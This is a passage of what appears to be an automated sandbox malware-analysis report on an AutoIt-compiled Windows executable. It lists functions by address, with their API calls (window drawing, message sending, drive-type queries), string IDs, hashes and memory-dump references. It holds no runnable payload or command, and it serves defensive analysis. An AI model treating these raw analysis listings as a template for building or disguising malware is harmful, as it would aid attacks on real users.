                                    • Opcode Fuzzy Hash: 0065f633b84378dd0871d770a71a92396cae57e3d61dc8a1cc35340b2d00438a
                                    • Instruction Fuzzy Hash: 55D17E302043119FCB14EF14C456A6E77E9FF95354F188868F8869B7E2DB61EE4ACB42
                                    Function 0090A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0090A630
                                    • GetSysColorBrush.USER32(0000000F), ref: 0090A661
                                    • GetSysColor.USER32(0000000F), ref: 0090A66D
                                    • SetBkColor.GDI32(?,000000FF), ref: 0090A687
                                    • SelectObject.GDI32(?,00000000), ref: 0090A696
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A6C1
                                    • GetSysColor.USER32(00000010), ref: 0090A6C9
                                    • CreateSolidBrush.GDI32(00000000), ref: 0090A6D0
                                    • FrameRect.USER32(?,?,00000000), ref: 0090A6DF
                                    • DeleteObject.GDI32(00000000), ref: 0090A6E6
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0090A731
                                    • FillRect.USER32(?,?,00000000), ref: 0090A763
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090A78E
                                      • Part of subcall function 0090A8CA: GetSysColor.USER32(00000012), ref: 0090A903
                                      • Part of subcall function 0090A8CA: SetTextColor.GDI32(?,?), ref: 0090A907
                                      • Part of subcall function 0090A8CA: GetSysColorBrush.USER32(0000000F), ref: 0090A91D
                                      • Part of subcall function 0090A8CA: GetSysColor.USER32(0000000F), ref: 0090A928
                                      • Part of subcall function 0090A8CA: GetSysColor.USER32(00000011), ref: 0090A945
                                      • Part of subcall function 0090A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090A953
                                      • Part of subcall function 0090A8CA: SelectObject.GDI32(?,00000000), ref: 0090A964
                                      • Part of subcall function 0090A8CA: SetBkColor.GDI32(?,00000000), ref: 0090A96D
                                      • Part of subcall function 0090A8CA: SelectObject.GDI32(?,?), ref: 0090A97A
                                      • Part of subcall function 0090A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0090A999
                                      • Part of subcall function 0090A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090A9B0
                                      • Part of subcall function 0090A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0090A9C5
                                      • Part of subcall function 0090A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090A9ED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 3521893082-0
                                    • Opcode ID: 7730c5f39dbc60203a3d874fd288429c32ae1c09f9d6c64e41b9c4c1075034e7
                                    • Instruction ID: 19f97fb699172462cb13221db2514c6449c50e514e853f5d75be8bfef04a57ac
                                    • Opcode Fuzzy Hash: 7730c5f39dbc60203a3d874fd288429c32ae1c09f9d6c64e41b9c4c1075034e7
                                    • Instruction Fuzzy Hash: 4D918D72418301EFDB609F64DC08A6B7BB9FF89321F104B29F962961E0D771DA44DB92
                                    Function 008F74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 008F74DE
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008F759D
                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008F75DB
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008F75ED
                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7633
                                    • GetClientRect.USER32(00000000,?), ref: 008F763F
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008F7683
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F7692
                                    • GetStockObject.GDI32(00000011), ref: 008F76A2
                                    • SelectObject.GDI32(00000000,00000000), ref: 008F76A6
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008F76B6
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F76BF
                                    • DeleteDC.GDI32(00000000), ref: 008F76C8
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008F76F4
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 008F770B
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008F7746
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008F775A
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 008F776B
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008F779B
                                    • GetStockObject.GDI32(00000011), ref: 008F77A6
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008F77B1
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008F77BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 49c33c317a68347afc472e046a8c30ad7e39bef73b404951903ef3201142ad30
                                    • Instruction ID: 614c9d8ff2dcc2503910ca9b3cddfaf809d1fefed3cde460ea8e054804044808
                                    • Opcode Fuzzy Hash: 49c33c317a68347afc472e046a8c30ad7e39bef73b404951903ef3201142ad30
                                    • Instruction Fuzzy Hash: B2A17F71A54619BFEB14DBA8DC4AFAE7BB9FB09710F004115FA14E72E1D6B0AD00DB60
                                    Function 008EAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 008EAD1E
                                    • GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EADFB
                                    • SetErrorMode.KERNEL32(00000000,0090FAC0,?,\\.\,0090F910), ref: 008EAF59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: c52ef22180c14e842ae79ac9f9c626fe8924b15b631fdc88f5ea5f84fca4b3bf
                                    • Instruction ID: e8eb6160bfc1f4d72e011551ea7d27d6bdd07a8f26693125b65dfec5e045a7bc
                                    • Opcode Fuzzy Hash: c52ef22180c14e842ae79ac9f9c626fe8924b15b631fdc88f5ea5f84fca4b3bf
                                    • Instruction Fuzzy Hash: 485187B064424A9BCB18EB16D952C7E73B1FF8AB08B204156F407E7291DE71BD41DB53
                                    Function 008868DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 387633a2b62fb872e13f7217007449b56139cb68a86679e39cc6532fa684dd87
                                    • Instruction ID: 448f9e762dfe6a9a3a33628bc30e0677e11b57c19c0f7bdbb84a7162015acdee
                                    • Opcode Fuzzy Hash: 387633a2b62fb872e13f7217007449b56139cb68a86679e39cc6532fa684dd87
                                    • Instruction Fuzzy Hash: F38105B06002196BDB21BB68EC43FEB37A8FF15704F040025F905EA6D2FB60DA61D762
                                    Function 00882C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?), ref: 00882CA2
                                    • DeleteObject.GDI32(00000000), ref: 00882CE8
                                    • DeleteObject.GDI32(00000000), ref: 00882CF3
                                    • DestroyCursor.USER32(00000000), ref: 00882CFE
                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00882D09
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC43B
                                    • 6F550200.COMCTL32(?,000000FF,?), ref: 008BC474
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BC89D
                                      • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                                    • SendMessageW.USER32(?,00001053), ref: 008BC8DA
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BC8F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                    • String ID: 0
                                    • API String ID: 2586706302-4108050209
                                    • Opcode ID: ce0c64806533b1edf882df529653331f9d3b00b15a92b4937460867127e14bcd
                                    • Instruction ID: 80a4c2c3eef13fd9367f9ce48684c8463131a532868afafc7757b3e71b3ce7d0
                                    • Opcode Fuzzy Hash: ce0c64806533b1edf882df529653331f9d3b00b15a92b4937460867127e14bcd
                                    • Instruction Fuzzy Hash: B3129D30604201EFDB21DF28C994BB9BBE5FF05304F5445A9F896CB662CB31E942DBA1
                                    Function 0090A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 0090A903
                                    • SetTextColor.GDI32(?,?), ref: 0090A907
                                    • GetSysColorBrush.USER32(0000000F), ref: 0090A91D
                                    • GetSysColor.USER32(0000000F), ref: 0090A928
                                    • CreateSolidBrush.GDI32(?), ref: 0090A92D
                                    • GetSysColor.USER32(00000011), ref: 0090A945
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090A953
                                    • SelectObject.GDI32(?,00000000), ref: 0090A964
                                    • SetBkColor.GDI32(?,00000000), ref: 0090A96D
                                    • SelectObject.GDI32(?,?), ref: 0090A97A
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A999
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090A9B0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0090A9C5
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090A9ED
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0090AA14
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0090AA32
                                    • DrawFocusRect.USER32(?,?), ref: 0090AA3D
                                    • GetSysColor.USER32(00000011), ref: 0090AA4B
                                    • SetTextColor.GDI32(?,00000000), ref: 0090AA53
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0090AA67
                                    • SelectObject.GDI32(?,0090A5FA), ref: 0090AA7E
                                    • DeleteObject.GDI32(?), ref: 0090AA89
                                    • SelectObject.GDI32(?,?), ref: 0090AA8F
                                    • DeleteObject.GDI32(?), ref: 0090AA94
                                    • SetTextColor.GDI32(?,?), ref: 0090AA9A
                                    • SetBkColor.GDI32(?,?), ref: 0090AAA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: d4891b11005452285da268d2003bb177264fca95fe414fbe680378ce3d2328f4
                                    • Instruction ID: c6e85e54003e13b8d98f4b95df6bb603714eda8bec4563db68190d6f676869ba
                                    • Opcode Fuzzy Hash: d4891b11005452285da268d2003bb177264fca95fe414fbe680378ce3d2328f4
                                    • Instruction Fuzzy Hash: F8513B71914208EFDF209FA4DC48EAE7BB9EF09320F114625F911AB2A1D7759A40EF90
                                    Function 009089D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00908AC1
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908AD2
                                    • CharNextW.USER32(0000014E), ref: 00908B01
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00908B42
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00908B58
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908B69
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00908B86
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00908BD8
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00908BEE
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00908C1F
                                    • _memset.LIBCMT ref: 00908C44
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00908C8D
                                    • _memset.LIBCMT ref: 00908CEC
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00908D16
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00908D6E
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00908E1B
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00908E3D
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00908E87
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00908EB4
                                    • DrawMenuBar.USER32(?), ref: 00908EC3
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00908EEB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: f1c92f709f0c1c128793396472cf44dd48a29f48380cf122413565097117fb08
                                    • Instruction ID: 253cc38bf1e2563293b17b88dc7196e5e9889e90f2999908ec0ffb1ac93c93b9
                                    • Opcode Fuzzy Hash: f1c92f709f0c1c128793396472cf44dd48a29f48380cf122413565097117fb08
                                    • Instruction Fuzzy Hash: 69E18D71A04219AFDF209F64CC84EEF7BB9EF09710F008156F995AA2D1DB748A81DF60
                                    Function 0090488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 009049CA
                                    • GetDesktopWindow.USER32 ref: 009049DF
                                    • GetWindowRect.USER32(00000000), ref: 009049E6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00904A48
                                    • DestroyWindow.USER32(?), ref: 00904A74
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904A9D
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904ABB
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904AE1
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00904AF6
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904B09
                                    • IsWindowVisible.USER32(?), ref: 00904B29
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904B44
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904B58
                                    • GetWindowRect.USER32(?,?), ref: 00904B70
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00904B96
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00904BB0
                                    • CopyRect.USER32(?,?), ref: 00904BC7
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00904C32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 134ee38f7a549c33acbac206714524b63084921e23b80197021aab303458f999
                                    • Instruction ID: 3a9ce9c2896134cda94d8aedf43a4f3fd1b234f335471a076b4cc8a07490c939
                                    • Opcode Fuzzy Hash: 134ee38f7a549c33acbac206714524b63084921e23b80197021aab303458f999
                                    • Instruction Fuzzy Hash: 2BB19DB1608341AFDB04DF64C844B6ABBE8FF88714F008A1CF6999B2A1D771ED05CB56
                                    Function 008827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828BC
                                    • GetSystemMetrics.USER32(00000007), ref: 008828C4
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828EF
                                    • GetSystemMetrics.USER32(00000008), ref: 008828F7
                                    • GetSystemMetrics.USER32(00000004), ref: 0088291C
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00882939
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00882949
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0088297C
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00882990
                                    • GetClientRect.USER32(00000000,000000FF), ref: 008829AE
                                    • GetStockObject.GDI32(00000011), ref: 008829CA
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 008829D5
                                      • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                      • Part of subcall function 00882344: ScreenToClient.USER32(009457B0,?), ref: 00882374
                                      • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                      • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                    • SetTimer.USER32(00000000,00000000,00000028,00881256), ref: 008829FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: d5ac5cc4b3e02061d4f09be7c49cb367f6e9a852b6ad8a66f1a34510ed180013
                                    • Instruction ID: 7426e4c51f01db3961219d706ea1734e0a65bb5031d0cbc49150d47a206e8561
                                    • Opcode Fuzzy Hash: d5ac5cc4b3e02061d4f09be7c49cb367f6e9a852b6ad8a66f1a34510ed180013
                                    • Instruction Fuzzy Hash: 1DB19E71A1020AEFDB24EFA8DC55FAE7BB4FB08314F104129FA15E72A0DB74A941DB50
                                    Function 008DA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 008DA47A
                                    • __swprintf.LIBCMT ref: 008DA51B
                                    • _wcscmp.LIBCMT ref: 008DA52E
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008DA583
                                    • _wcscmp.LIBCMT ref: 008DA5BF
                                    • GetClassNameW.USER32(?,?,00000400), ref: 008DA5F6
                                    • GetDlgCtrlID.USER32(?), ref: 008DA648
                                    • GetWindowRect.USER32(?,?), ref: 008DA67E
                                    • GetParent.USER32(?), ref: 008DA69C
                                    • ScreenToClient.USER32(00000000), ref: 008DA6A3
                                    • GetClassNameW.USER32(?,?,00000100), ref: 008DA71D
                                    • _wcscmp.LIBCMT ref: 008DA731
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 008DA757
                                    • _wcscmp.LIBCMT ref: 008DA76B
                                      • Part of subcall function 008A362C: _iswctype.LIBCMT ref: 008A3634
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
